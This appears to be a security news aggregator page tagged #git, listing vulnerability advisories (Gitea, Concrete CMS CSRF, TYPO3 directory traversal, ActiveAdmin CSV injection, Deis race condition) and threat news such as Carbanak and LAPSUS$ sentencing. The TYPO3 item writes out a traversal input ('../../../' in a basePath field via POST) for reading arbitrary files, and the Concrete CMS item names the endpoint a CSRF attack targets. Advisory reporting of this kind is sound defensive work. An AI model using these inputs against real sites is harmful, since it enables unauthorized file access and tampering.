Security
Headlines
HeadlinesLatestCVEs

Tag

#git

Gentoo Linux Security Advisory 202312-13

Gentoo Linux Security Advisory 202312-13 - Multiple vulnerabilities have been discovered in Gitea, the worst of which could result in information leakage. Versions greater than or equal to 1.20.6 are affected.

Packet Storm
#vulnerability#web#mac#linux#git
How to recognize AI-generated phishing mails

Cybercriminals now have AI to write their phishing emails, which might well improve their success rates. Here's what to watch out for.

Carbanak Banking Malware Resurfaces with New Ransomware Tactics

The banking malware known as Carbanak has been observed being used in ransomware attacks with updated tactics. "The malware has adapted to incorporate attack vendors and techniques to diversify its effectiveness," cybersecurity firm NCC Group said in an analysis of ransomware attacks that took place in November 2023. "Carbanak returned last month through new

GHSA-qp42-5pj7-4ccm: Concrete CMS Cross Site Request Forgery (CSRF)

Concrete CMS 9 before 9.2.3 is vulnerable to Cross Site Request Forgery (CSRF) via `/ccm/system/dialogs/logs/delete_all/submit`. An attacker can force an admin user to delete server report logs on a web application to which they are currently authenticated.

Cloud Atlas' Spear-Phishing Attacks Target Russian Agro and Research Companies

The threat actor referred to as Cloud Atlas has been linked to a set of spear-phishing attacks on Russian enterprises. Targets included a Russian agro-industrial enterprise and a state-owned research company, according to a report from F.A.C.C.T., a standalone cybersecurity company formed after Group-IB's formal exit from Russia earlier this year. Cloud Atlas, active since at

GHSA-3gjc-mp82-fj4q: TYPO3 Arbitrary File Read via Directory Traversal

In TYPO3 11.5.24, the filelist component allows attackers (who have access to the administrator panel) to read arbitrary files via directory traversal in the baseuri field, as demonstrated by POST `/typo3/record/edit` with `../../../ in data[sys_file_storage]*[data][sDEF][lDEF][basePath][vDEF]`.

Adobe Real-Time CDP: Personalized Customer Experience

By Owais Sultan In the current high-tech age, consumer data is a business’s most important asset as they progressively shifts towards… This is a post from HackRead.com Read the original post: Adobe Real-Time CDP: Personalized Customer Experience

GHSA-rqxc-9p8h-xqgq: ActiveAdmin vulnerable to CSV injection

csv_builder.rb in ActiveAdmin (aka Active Admin) before 3.2.0 allows CSV injection.

British LAPSUS$ Teen Members Sentenced for High-Profile Attacks

Two British teens part of the LAPSUS$ cyber crime and extortion gang have been sentenced for their roles in orchestrating a string of high-profile attacks against a number of companies. Arion Kurtaj, an 18-year-old from Oxford, has been sentenced to an indefinite hospital order due to his intent to get back to cybercrime "as soon as possible," BBC reported. Kurtaj, who is autistic, was

GHSA-jpfp-xq3p-4h3r: Deis Workflow Manager race condition vulnerability

** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in Deis Workflow Manager up to 2.3.2. It has been classified as problematic. This affects an unknown part. The manipulation leads to race condition. The complexity of an attack is rather high. The exploitability is told to be difficult. Upgrading to version 2.3.3 is able to address this issue. The patch is named 31fe3bccbdde134a185752e53380330d16053f7f. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248847. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.